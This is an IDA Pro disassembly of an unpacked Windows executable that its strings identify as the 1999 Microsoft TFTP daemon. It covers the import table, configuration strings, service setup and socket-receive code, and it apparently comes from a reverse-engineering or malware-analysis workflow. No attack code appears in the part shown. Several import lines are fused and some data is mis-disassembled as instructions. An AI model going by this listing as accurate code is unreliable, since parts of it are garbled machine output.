;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9E9043D11BA8B9924C2D7960E102DE4E
; File Name : u:\work\9e9043d11ba8b9924c2d7960e102de4e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 1001000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1001000 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_1001004 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_1001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_100100C dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_1001010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_1001014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatus ; sub_1001DEB+6B�r ...
dd 0
dword_100101C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_1001020 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_1001024 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_1001028 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_100102C dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_1002F31+1C3�r ...
dword_1001030 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_1001034 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_1001038 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_1001665:loc_1001762�r ...
dword_100103C dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_1001A91+1AB�r
dword_1001040 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_10018DB+B4�r ...
dword_1001044 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_10019F0+14�r ...
dword_1001048 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_100104C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_1001A91+B5�r ...
dword_1001050 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeapdword_1001054 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_1001E73+9E�r ...
dword_1001058 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_1001A91+4E�r ...
dword_100105C dd 7C809766h, 7C80A05Dh, 7C9105D4h, 7C80A03Bh; resolved to->KERNEL32.InterlockedIncrement ; sub_1001A91+2C1�r ...
dword_100106C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_100205A+4E�r
dword_1001070 dd 7C90112Bh ; resolved to->NTDLL.RtlTryEnterCriticalSectiondword_1001074 dd 7C839732h ; resolved to->KERNEL32.SuspendThread dd 0
dword_100107C dd 77C39D67h ; resolved to->MSVCRT._inittermdword_1001080 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_1001084 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_1001088 dd 77C2EFB0h ; resolved to->MSVCRT._lseekdword_100108C dd 77C2D0D7h ; resolved to->MSVCRT._closedword_1001090 dd 77C2FAA3h ; resolved to->MSVCRT._readdword_1001094 dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_100205A+93�r ...
dword_1001098 dd 77C2C437h ; resolved to->MSVCRT.reallocdword_100109C dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_10010A0 dd 77C2C21Bh ; resolved to->MSVCRT.free ; sub_1001F54+47�r ...
dword_10010A4 dd 77C4AEA3h ; resolved to->MSVCRT.time ; sub_1001DEB+8�r
dword_10010A8 dd 77C1F3A5h ; resolved to->MSVCRT._chdirdword_10010AC dd 77C1F2BCh ; resolved to->MSVCRT._errno ; sub_10027E1+77�r ...
; ---------------------------------------------------------------------------
loc_10010B0: ; DATA XREF: sub_1001665+1AE�r
daa
clc
sal dword ptr [edi+10h], 0F0h ; DATA XREF: sub_1001665+1DB�r
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010B8 dd 77C4A9F1h ; resolved to->MSVCRT.ctime ; sub_1001DEB+19�r
dword_10010BC dd 77C4EE2Fh ; resolved to->MSVCRT._controlfp; ---------------------------------------------------------------------------
loc_10010C0: ; DATA XREF: seg000:loc_1003BF0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010C4 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_10010C8 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_10010CC dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_10010D0 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_10010D4 dd 77C4186Ah ; resolved to->MSVCRT.printfdword_10010D8 dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenv; ---------------------------------------------------------------------------
loc_10010DC: ; DATA XREF: sub_1003BA0�r
scasb
sub eax, 9E9A77C3h ; DATA XREF: seg000:01003B7A�r
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010E4 dd 77C2F566h ; resolved to->MSVCRT._open ; sub_100333A+1B9�r
dword_10010E8 dd 77C30303h ; resolved to->MSVCRT._writedword_10010EC dd 77C39E7Eh ; resolved to->MSVCRT.exit ; sub_1001665+C0�r ...
dd 0
dword_10010F4 dd 71AB8769h ; resolved to->WS2_32.WSASocketAdword_10010F8 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_1001A91+12B�r ...
dword_10010FC dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_1001100 dd 71AB4573h ; resolved to->WS2_32.WSAEventSelectdword_1001104 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_100230A+F�r ...
dword_1001108 dd 71AC0D03h ; resolved to->WS2_32.WSAGetOverlappedResultdword_100110C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_1002A3D+40�r ...
dword_1001110 dd 71ABF652h, 71AB4519h; resolved to->WS2_32.WSARecvFrom ; sub_1001A91+2A�r
dword_1001118 dd 71AB4682h ; resolved to->WS2_32.WSACloseEventdword_100111C dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_100205A+E7�r ...
dword_1001120 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_1002F31+64�r ...
dword_1001124 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_1002F31+256�r ...
dword_1001128 dd 71ABE6EBh ; resolved to->WS2_32.getservbynamedword_100112C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_100333A+1EB�r
dword_1001130 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_1002A3D+65�r ...
align 8
dword_1001138 dd 76D66300h ; resolved to->IPHLPAPI.NotifyAddrChangedword_100113C dd 76D63B9Ch ; resolved to->IPHLPAPI.GetIpAddrTable dd 0
dword_1001144 dd 7C90253Ah ; resolved to->NTDLL.memmovedword_1001148 dd 7C902C80h ; resolved to->NTDLL.strncpydword_100114C dd 7C96FB58h ; resolved to->NTDLL.isupperdword_1001150 dd 7C970328h ; resolved to->NTDLL.tolower ; sub_100333A+95�r
dword_1001154 dd 7C9383CDh ; resolved to->NTDLL.RtlUpdateTimer ; sub_1002B5E+114�r ...
dword_1001158 dd 7C92D707h ; resolved to->NTDLL.RtlDeleteTimer ; sub_1002A3D+FD�r ...
dword_100115C dd 7C913374h ; resolved to->NTDLL._stricmpdword_1001160 dd 7C924C29h ; resolved to->NTDLL.atoi ; sub_10023D8+F2�r
dword_1001164 dd 7C92F23Ah ; resolved to->NTDLL._itoadword_1001168 dd 7C92D97Bh ; resolved to->NTDLL.RtlDeregisterWaitEx ; sub_1002901+35�r
dword_100116C dd 7C901A09h ; resolved to->NTDLL._chkstkdword_1001170 dd 7C92EBF8h ; resolved to->NTDLL.RtlCreateTimerQueuedword_1001174 dd 7C9359F3h ; resolved to->NTDLL.RtlRegisterWait ; sub_10018DB+D6�r
dword_1001178 dd 7C92DFACh ; resolved to->NTDLL.RtlCreateTimer ; sub_1002F31+34D�r ...
dd 9 dup(0)
dd 37ECADD7h, 0
dd 3, 310h, 0
dd 4D10h, 0
dd 37ECADD7h, 0
dd 6, 2 dup(0)
dd 5020h, 0
dd 37ECADD7h, 0
dd 2, 1Ah, 0
db 90h
db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
db ' 22:17:18',0Ah,0
aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4�o
aWritable db 'writable',0 ; DATA XREF: sub_1001570+BF�o
; sub_10037BF+121�o
align 4
aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6�o
aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1�o
; sub_10037BF+F1�o
align 4
aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8�o
aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3�o
; sub_10037BF+C1�o
aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9A�o
aClients db 'clients',0 ; DATA XREF: sub_1001570+95�o
; sub_10037BF+8E�o
aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah
; DATA XREF: sub_1001570+8D�o
db 0
align 4
aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84�o
aDirectory db 'directory',0 ; DATA XREF: sub_1001570+7F�o
; sub_10037BF+5C�o
align 4
aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
; DATA XREF: sub_1001570+76�o
aSystemCurrentc db 'System\CurrentControlSet\Services\tftpd\parameters',0
; DATA XREF: sub_1001570+71�o
; sub_10037BF+13�o
align 10h
aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68�o
db 0Ah,0
align 4
aTftpd_log db 'tftpd.log',0 ; DATA XREF: sub_1001570+63�o
; sub_1001665+1D6�o
align 4
aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5A�o
align 4
aTftpdroot db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55�o
; sub_1003910+1E�o
a? db '-?',0 ; DATA XREF: sub_1001570+10�o
align 4
aA db 'a+',0 ; DATA XREF: sub_1001665+1D1�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_100205A+31�o
align 10h
aUdp db 'udp',0 ; DATA XREF: sub_100205A+2C�o
aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: seg000:01005CE0�o
align 10h
aNoSuchUser db 'No such user',0 ; DATA XREF: seg000:01005CDC�o
align 10h
aFileAlreadyExi db 'File already exists',0 ; DATA XREF: seg000:01005CD8�o
aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: seg000:01005CD4�o
aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: seg000:01005CD0�o
align 10h
aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: seg000:01005CCC�o
align 4
aAccessViolatio db 'Access violation',0 ; DATA XREF: seg000:01005CC8�o
align 4
aFileNotFound db 'File not found',0 ; DATA XREF: seg000:01005CC4�o
align 4
aErrorUndefined db 'Error undefined',0 ; DATA XREF: seg000:off_1005CC0�o
aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251A�o
align 10h
aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498�o
aBlksize db 'blksize',0 ; DATA XREF: sub_10023D8+4E�o
aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2�o
aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197�o
; sub_100333A+201�o ...
align 10h
aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195�o
; sub_100333A+1A0�o
align 4
aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139�o
; sub_100333A+159�o
aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2�o
; sub_100333A:loc_100341F�o
align 10h
aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9F�o
; sub_100333A:loc_10033E1�o
align 4
asc_100155C: ; DATA XREF: sub_1003910+7F�o
unicode 0, <\>,0
dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B R O U T I N E =======================================
sub_1001570 proc near ; CODE XREF: seg000:01003B4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 1
push esi
jle loc_1001646
mov eax, [esp+4+arg_4]
mov esi, offset a? ; "-?"
mov eax, [eax+4]
loc_1001588: ; CODE XREF: sub_1001570+34�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_10015AA
test cl, cl
jz short loc_10015A6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_10015AA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_1001588
loc_10015A6: ; CODE XREF: sub_1001570+22�j
xor eax, eax
jmp short loc_10015AF
; ---------------------------------------------------------------------------
loc_10015AA: ; CODE XREF: sub_1001570+1E�j
; sub_1001570+2C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_10015AF: ; CODE XREF: sub_1001570+38�j
test eax, eax
jnz loc_1001646
mov esi, dword_10010D4
push offset asc_1005010 ; " ======================================"...
call esi ; dword_10010D4
pop ecx
push offset aTftpdroot ; "\\tftpdroot\\"
push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTftpd_log ; "tftpd.log"
push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aDirectory ; "directory"
push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"...
call esi ; dword_10010D4
pop ecx
push offset aClients ; "clients"
push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aMasters ; "masters"
push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aReadable ; "readable"
push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aWritable ; "writable"
push offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push 0FFFFFFFFh
call dword_10010EC ; exit
pop ecx
loc_1001646: ; CODE XREF: sub_1001570+6�j
; sub_1001570+41�j
push offset off_1005CB0
call dword_1001004 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_100165B
call dword_1001038 ; RtlGetLastWin32Error
loc_100165B: ; CODE XREF: sub_1001570+E3�j
push 0
call dword_100101C ; ExitProcess
pop esi
retn
sub_1001570 endp
; =============== S U B R O U T I N E =======================================
sub_1001665 proc near ; DATA XREF: seg000:01005CB4�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push offset sub_1001DEB
push offset aTftpd ; "Tftpd"
mov dword_1006120, 30h
mov dword_1006124, 2
mov dword_1006128, ebp
mov dword_1006134, 1
mov dword_1006138, 4E20h
mov dword_100612C, ebp
mov dword_1006130, ebp
call dword_1001010 ; RegisterServiceCtrlHandlerA
cmp eax, ebp
mov dword_1006044, eax
jz loc_1001762
mov esi, dword_1001014
mov edi, offset dword_1006120
push edi
push eax
call esi ; dword_1001014
cmp eax, ebp
jz loc_1001762
mov ebx, dword_1001040
push ebp
push ebp
push ebp
push ebp
call ebx ; dword_1001040
push ebp
push ebp
push ebp
push ebp
mov dword_1005DDC, eax
call ebx ; dword_1001040
cmp dword_1005DDC, ebp
mov dword_1005DE0, eax
jz short loc_100171C
cmp eax, ebp
jz short loc_100171C
push offset dword_1006140
push 101h
call dword_10010FC ; WSAStartup
cmp eax, 0FFFFFFFFh
jnz short loc_1001735
call dword_10010F8 ; WSAGetLastError
loc_100171C: ; CODE XREF: sub_1001665+96�j
; sub_1001665+9A�j ...
push 1Fh
call sub_1001E73
push 1
call dword_10010EC ; exit
pop ecx
loc_100172C: ; CODE XREF: sub_1001665+218�j
; sub_1001665+224�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_1001735: ; CODE XREF: sub_1001665+AF�j
push edi
mov dword_1006124, 4
push dword_1006044
mov dword_1006128, 7
mov dword_1006134, ebp
mov dword_1006138, ebp
call esi ; dword_1001014
cmp eax, ebp
jnz short loc_100176A
loc_1001762: ; CODE XREF: sub_1001665+57�j
; sub_1001665+6E�j
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100171C
; ---------------------------------------------------------------------------
loc_100176A: ; CODE XREF: sub_1001665+FB�j
push 9
pop ecx
xor eax, eax
mov edx, offset dword_10060C0
mov edi, edx
rep stosd
push edx
call dword_10010A4 ; time
pop ecx
mov edx, [esp+10h+arg_0]
dec edx
mov ebx, (offset dword_1005E07+1)
jz short loc_10017F3
mov eax, [esp+10h+arg_4]
lea eax, [eax+edx*4]
mov [esp+10h+arg_0], eax
loc_1001797: ; CODE XREF: sub_1001665+18C�j
mov eax, [esp+10h+arg_0]
mov eax, [eax]
cmp byte ptr [eax], 2Dh
jnz short loc_10017F3
movsx ecx, byte ptr [eax+1]
sub ecx, 64h
jz short loc_10017C9
dec ecx
jz short loc_10017BD
dec ecx
jnz short loc_10017E9
mov dword_1005DD8, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017BD: ; CODE XREF: sub_1001665+147�j
mov dword_1005DD4, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017C9: ; CODE XREF: sub_1001665+144�j
lea edi, [eax+2]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10017E9: ; CODE XREF: sub_1001665+14A�j
; sub_1001665+156�j ...
sub [esp+10h+arg_0], 4
dec edx
cmp edx, ebp
ja short loc_1001797
loc_10017F3: ; CODE XREF: sub_1001665+125�j
; sub_1001665+13B�j
call sub_10037BF
call sub_1003910
mov esi, dword_10010A8
push ebx
call esi ; dword_10010A8
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_100182E
call dword_10010AC ; _errno
push ebx
call dword ptr loc_10010B0
cmp eax, ebp
pop ecx
jnz loc_100171C
push ebx
call esi ; dword_10010A8
cmp eax, ebp
pop ecx
jnz loc_100171C
loc_100182E: ; CODE XREF: sub_1001665+1A5�j
cmp dword_1005DD8, ebp
jz short loc_1001857
push offset aA ; "a+"
push offset aTftpd_log ; "tftpd.log"
call dword ptr loc_10010B2+2
pop ecx
cmp eax, ebp
pop ecx
mov dword_1005DD0, eax
jnz short loc_1001857
mov dword_1005DD8, ebp
loc_1001857: ; CODE XREF: sub_1001665+1CF�j
; sub_1001665+1EA�j
push offset dword_10060C0
call dword_10010B8 ; ctime
pop ecx
call sub_10018DB
call sub_10019F0
push 0FFFFFFFFh
push dword_1005DDC
call dword_100103C ; WaitForSingleObject
cmp eax, ebp
jz loc_100172C
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_100172C
sub_1001665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100188E proc near ; CODE XREF: sub_100205A+D5�p
; sub_1002F31+2A8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push 3
push [ebp+arg_4]
push [ebp+arg_0]
call dword_1001100 ; WSAEventSelect
test eax, eax
jz short loc_10018AE
call dword_1001038 ; RtlGetLastWin32Error
xor eax, eax
jmp short locret_10018D7
; ---------------------------------------------------------------------------
loc_10018AE: ; CODE XREF: sub_100188E+14�j
test [ebp+arg_8], 1
push 0
push 0FFFFFFFFh
push [ebp+arg_0]
jz short loc_10018C2
push offset loc_1001D74
jmp short loc_10018C7
; ---------------------------------------------------------------------------
loc_10018C2: ; CODE XREF: sub_100188E+2B�j
push offset loc_1001DDB
loc_10018C7: ; CODE XREF: sub_100188E+32�j
push [ebp+arg_4]
lea eax, [ebp+var_4]
push eax
call dword_1001174 ; RtlRegisterWait
mov eax, [ebp+var_4]
locret_10018D7: ; CODE XREF: sub_100188E+1E�j
leave
retn 0Ch
sub_100188E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018DB proc near ; CODE XREF: sub_1001665+1FE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, dword_1001044
push edi
push offset dword_1006080
call esi ; dword_1001044
push offset dword_1006020
call esi ; dword_1001044
mov eax, offset dword_1006098
mov dword_100609C, eax
mov dword_1006098, eax
mov eax, offset dword_1006038
mov dword_100603C, eax
mov dword_1006038, eax
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
xor esi, esi
test eax, eax
jnz short loc_1001957
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_100194F
xor edi, edi
loc_100192E: ; CODE XREF: sub_10018DB+72�j
mov ecx, [eax+edi+4]
cmp ecx, esi
jz short loc_1001947
cmp ecx, 100007Fh
jz short loc_1001947
push ecx
call sub_100205A
mov eax, [ebp+var_4]
loc_1001947: ; CODE XREF: sub_10018DB+59�j
; sub_10018DB+61�j
inc ebx
add edi, 18h
cmp ebx, [eax]
jb short loc_100192E
loc_100194F: ; CODE XREF: sub_10018DB+4F�j
push eax
call dword_10010A0 ; free
pop ecx
loc_1001957: ; CODE XREF: sub_10018DB+46�j
push offset dword_10060A0
call dword_1001170 ; RtlCreateTimerQueue
cmp eax, esi
jnz loc_10019EB
mov eax, 0EA60h
push esi
push eax
push eax
push esi
push offset sub_10029BA
push offset dword_1006048
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
push esi
push esi
push esi
push esi
mov edi, eax
call dword_1001040 ; CreateEventA
cmp eax, esi
mov dword_1005DF8, eax
jnz short loc_10019A2
mov eax, edi
jmp short loc_10019EB
; ---------------------------------------------------------------------------
loc_10019A2: ; CODE XREF: sub_10018DB+C1�j
push esi
push 0FFFFFFFFh
push esi
push offset sub_1002219
push eax
push offset dword_1005DFC
call dword_1001174 ; RtlRegisterWait
cmp eax, esi
jnz short loc_10019EB
mov ecx, offset dword_1006100
xor eax, eax
mov edi, ecx
push ecx
stosd
stosd
stosd
stosd
stosd
mov eax, dword_1005DF8
push offset dword_1005E00
mov dword_1006110, eax
call sub_1003A44 ; NotifyAddrChange
cmp eax, esi
jz short loc_10019E9
cmp eax, 3E5h
jnz short loc_10019EB
loc_10019E9: ; CODE XREF: sub_10018DB+105�j
xor eax, eax
loc_10019EB: ; CODE XREF: sub_10018DB+89�j
; sub_10018DB+C5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_10018DB endp
; =============== S U B R O U T I N E =======================================
sub_10019F0 proc near ; CODE XREF: sub_1001665+203�p
mov eax, offset dword_1006078
push offset dword_1006060
mov dword_100607C, eax
mov dword_1006078, eax
call dword_1001044 ; InitializeCriticalSection
push 0
push 0EFD1Ch
push 0
call dword_1001048 ; HeapCreate
mov dword_1005DEC, eax
retn
sub_10019F0 endp
; =============== S U B R O U T I N E =======================================
sub_1001A1F proc near ; CODE XREF: sub_10029BA+79�p
push ebx
push esi
mov ebx, offset dword_1006060
push edi
push ebx
xor esi, esi
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1005DF0
sub eax, dword_1005DF4
cmp eax, 0Ah
jbe short loc_1001A46
shr eax, 1
mov esi, eax
jmp short loc_1001A4E
; ---------------------------------------------------------------------------
loc_1001A46: ; CODE XREF: sub_1001A1F+1F�j
cmp eax, 3
jbe short loc_1001A4E
push 2
pop esi
loc_1001A4E: ; CODE XREF: sub_1001A1F+25�j
; sub_1001A1F+2A�j
test esi, esi
jbe short loc_1001A86
mov edi, esi
loc_1001A54: ; CODE XREF: sub_1001A1F+65�j
mov eax, dword_1006078
mov esi, eax
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call dword_1001054 ; CloseHandle
push esi
push 0
push dword_1005DEC
call dword_1001050 ; RtlFreeHeap
dec dword_1005DF0
dec edi
jnz short loc_1001A54
loc_1001A86: ; CODE XREF: sub_1001A1F+31�j
push ebx
call dword_100104C ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
retn
sub_1001A1F endp
; =============== S U B R O U T I N E =======================================
sub_1001A91 proc near ; CODE XREF: seg000:01001DCC�p
; seg000:01001DE1�p
var_68 = byte ptr -68h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_10 = byte ptr 14h
arg_FF9C = dword ptr 0FFA0h
arg_FFA0 = dword ptr 0FFA4h
arg_FFA4 = dword ptr 0FFA8h
arg_FFA8 = dword ptr 0FFACh
arg_FFD4 = dword ptr 0FFD8h
arg_FFD8 = dword ptr 0FFDCh
arg_10004 = dword ptr 10008h
mov eax, 10004h
call sub_1003A3E ; _chkstk
push ebx
push ebp
xor ebp, ebp
push esi
push edi
mov [esp+10h], ebp
mov ebx, offset dword_1006060
loc_1001AAA: ; CODE XREF: sub_1001A91+291�j
lea eax, [esp+10h+arg_0]
push eax
push 4004667Fh
push [esp+18h+arg_10004]
call dword_1001110+4
cmp eax, ebp
jnz loc_1001D27
cmp [esp+1Ch+var_8], ebp
jz loc_1001D65
xor eax, eax
lea edi, [esp+1Ch+arg_10]
stosd
stosd
stosd
stosd
push ebx
stosd
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
inc dword_1005DF4
cmp eax, offset dword_1006078
jz short loc_1001B11
mov ecx, [eax]
mov esi, eax
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call dword_100105C+0Ch
mov eax, [esi+30h]
jmp short loc_1001B41
; ---------------------------------------------------------------------------
loc_1001B11: ; CODE XREF: sub_1001A91+64�j
inc dword_1005DF0
push 2FF6Ch
push 8
push dword_1005DEC
call dword_100105C+8
mov esi, eax
cmp esi, ebp
jz loc_1001D5E
push ebp
push ebp
push ebp
push ebp
call dword_1001040 ; CreateEventA
mov [esi+30h], eax
loc_1001B41: ; CODE XREF: sub_1001A91+7E�j
push ebx
mov [esp+40h+arg_0], eax
call dword_100104C ; RtlLeaveCriticalSection
lea ebp, [esi+34h]
mov ecx, 3FEFh
xor eax, eax
mov edi, ebp
rep stosd
stosb
mov eax, [esp+40h+arg_FFD8]
mov [esp+40h+var_1C], ebp
mov [esp+40h+var_20], 0FFBDh
mov [esp+40h+var_28], 10h
mov [esi+1Ch], eax
lea eax, [esp+40h+var_10]
push 0
push eax
lea eax, [esp+48h+var_28]
lea edi, [esi+2Ch]
push eax
lea eax, [esi+0Ch]
push eax
lea eax, [esp+50h+var_30]
push eax
push edi
lea eax, [esp+58h+var_20]
push 1
push eax
push [esp+60h+arg_FFD4]
call dword_1001110 ; WSARecvFrom
mov [esp+64h+var_48], eax
mov ax, [esi+0Eh]
push eax
call dword_100110C ; ntohs
cmp [esp+68h+var_4C], 0
jz short loc_1001C34
call dword_10010F8 ; WSAGetLastError
cmp eax, 3E5h
jnz loc_1001D2F
mov eax, dword_1005DDC
push 0FFFFFFFFh
mov [esp+6Ch+var_40], eax
mov eax, [esp+6Ch+var_28]
mov [esp+6Ch+var_3C], eax
lea eax, [esp+6Ch+var_40]
push 0
push eax
push 2
call dword_100105C+4
cmp eax, 0FFFFFFFFh
jz loc_1001D2F
cmp eax, 102h
jz loc_1001D2F
test eax, eax
jz loc_1001D2F
lea eax, [esp+78h+var_68]
push eax
push 0
lea eax, [esp+80h+var_48]
push edi
push eax
push [esp+88h+arg_FF9C]
call dword_1001108 ; WSAGetOverlappedResult
test eax, eax
jnz short loc_1001C34
call dword_10010F8 ; WSAGetLastError
